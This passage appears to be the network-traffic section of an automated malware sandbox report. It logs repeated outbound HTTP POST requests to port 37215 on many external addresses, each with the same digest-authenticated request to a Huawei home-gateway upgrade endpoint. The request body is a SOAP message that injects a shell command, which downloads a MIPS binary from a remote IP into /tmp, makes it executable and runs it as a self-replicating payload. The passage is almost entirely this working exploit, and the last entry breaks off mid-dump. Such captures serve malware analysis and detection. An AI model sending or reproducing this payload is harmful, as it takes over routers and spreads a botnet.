                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  130192.168.2.1357642181.207.54.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662060022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  131192.168.2.1334842177.108.32.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662081003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  132192.168.2.134462641.78.125.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662117958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  133192.168.2.1355888197.38.80.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662167072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  134192.168.2.1341914157.156.79.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662400007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  135192.168.2.1334806197.218.50.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662417889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  136192.168.2.135875635.158.159.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662533998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  137192.168.2.1345282197.195.14.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662626982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  138192.168.2.135546241.168.46.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662662983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  139192.168.2.1337532197.65.106.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663189888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 